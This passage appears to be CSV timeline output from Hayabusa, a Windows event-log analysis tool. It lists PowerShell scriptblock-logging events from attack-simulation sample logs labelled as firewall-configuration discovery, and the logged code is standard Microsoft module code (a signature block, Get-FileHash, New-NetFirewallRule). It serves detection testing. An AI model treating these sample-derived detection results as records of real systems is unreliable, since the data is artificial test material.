QFYnl+UlE/wq4QpTlVnkpKFjpGEwXzETMBEGCgmSJomT8ixkARkWA2NvbTEZMBcG # CgmSJomT8ixkARkWCW1pY3Jvc29mdDEtMCsGA1UEAxMkTWljcm9zb2Z0IFJvb3Qg # Q2VydGlmaWNhdGUgQXV0aG9yaXR5ghB5rRahSqClrUxzWPQHEy5lMFAGA1UdHwRJ # MEcwRaBDoEGGP2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1 # Y3RzL21pY3Jvc29mdHJvb3RjZXJ0LmNybDBUBggrBgEFBQcBAQRIMEYwRAYIKwYB # BQUHMAKGOGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljcm9z # b2Z0Um9vdENlcnQuY3J0MBMGA1UdJQQMMAoGCCsGAQUFBwMIMA0GCSqGSIb3DQEB # BQUAA4ICAQAQl4rDXANENt3ptK132855UU0BsS50cVttDBOrzr57j7gu1BKijG1i # uFcCy04gE1CZ3XpA4le7r1iaHOEdAYasu3jyi9DsOwHu4r6PCgXIjUji8FMV3U+r # kuTnjWrVgMHmlPIGL4UD6ZEqJCJw+/b85HiZLg33B+JwvBhOnY5rCnKVuKE5nGct # xVEO6mJcPxaYiyA/4gcaMvnMMUp2MT0rcgvI6nA9/4UKE9/CCmGO8Ne4F+tOi3/F # NSteo7/rvH0LQnvUU3Ih7jDKu3hlXFsBFwoUDtLaFJj1PLlmWLMtL+f5hYbMUVbo # nXCUbKw5TNT2eb+qGHpiKe+imyk0BncaYsk9Hm0fgvALxyy7z0Oz5fnsfbXjpKh0 # NbhOxXEjEiZ2CzxSjHFaRkMUvLOzsE1nyJ9C/4B5IYCeFTBm6EISXhrIniIh0EPp # K+m79EjMLNTYMoBMJipIJF9a6lbvpt6Znco6b72BJ3QGEe52Ib+bgsEnVLaxaj2J # oXZhtG6hE6a/qkfwEm/9ijJssv7fUciMI8lmvZ0dhxJkAj0tr1mPuOQh5bWwymO0 # eFQF1EEuUKyUsKV4q7OglnUa2ZKHE3UiLzKoCG6gW4wlv6DvhMoh1useT8ma7kng # 
9wFlb4kLfchpyOZu6qeXzjEp/w7FW1zYTRuh2Povnj8uVRZryROj/TGCBKcwggSj # AgEBMIGQMHkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xIzAh # BgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBAhMzAAAAsBGvCovQO5/d # AAEAAACwMAkGBSsOAwIaBQCggcAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwIwYJKoZIhvcNAQkEMRYEFClk # UQl5qDpcmXxdpFeDJK8FifcsMGAGCisGAQQBgjcCAQwxUjBQoCaAJABXAGkAbgBk # AG8AdwBzACAAUABvAHcAZQByAFMAaABlAGwAbKEmgCRodHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcG93ZXJzaGVsbCAwDQYJKoZIhvcNAQEBBQAEggEALlxQato88b0W # GuCgTkjSdxozipikRZRALhDIbPeqH6HtmgJcwK723FNOko6J0Xrhnt1w+Ypx77X2 # 8yP9Hu2sG+Cm+vH4RcLCKR9zAUQGmURsoNhCcRebCKchavCcPqYzL8WmMToUVuEB # epnqGcNr8gMvhur6+Tw22bJewK48IdD96JBDVEoihHj8d0jwM19UFPuT+EmebCRv # 8ii/hESmbCZnwQclRzaoA3oJ+odsWN+XbE3fHhrGSfnE7yaiMKsyHKQ+RsV9c1x9 # /XgOkPj1o/cfKgQ0qeOamP7HmABCWv9jGBaQ/lpLASraT6gaTl9yEPvuKx1ozorh # G1o2H651lKGCAigwggIkBgkqhkiG9w0BCQYxggIVMIICEQIBATCBjjB3MQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEwHwYDVQQDExhNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBQQ0ECEzMAAAA1KO5hU5IiYZEAAAAAADUwCQYFKw4DAhoF # AKBdMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTEz # MTIxODAwMjI1OFowIwYJKoZIhvcNAQkEMRYEFKH1XT6678OZm4aTERf5dKwwQZed # MA0GCSqGSIb3DQEBBQUABIIBAGgc0v8jALuDbFhj0n+eoe+T+K3O7SCk9SDcc8wC # 9MP+HYeyr7IvyMJY9Prn1v/JEkUNBczhWmFluGBzw1ASpTkP5hJRbdZFiQkbtqR1 # PZi8TWsbcoWjbqzwR3fgiwydRlkDu0zKO+P3pbuHFgO2ACb7ggLRllTgfWNJFZGg # iHFwS0JLQttb18AZTZyt7VteGhzOrcfRP97+bPpidJXfR1eMXbeoXuAROO0LdNP1 # 6QcsS/++dFMLo+s7ISTcdh9OTKg672kD7zo2+UKZ/MvJbsOikD7cFJppM2ZDCnvi # S5HhTmzKz47z2m+/DsWq7NMZ1pfJFojTeMw8niuUPNOZWRg= # SIG # End signature block",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value =",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 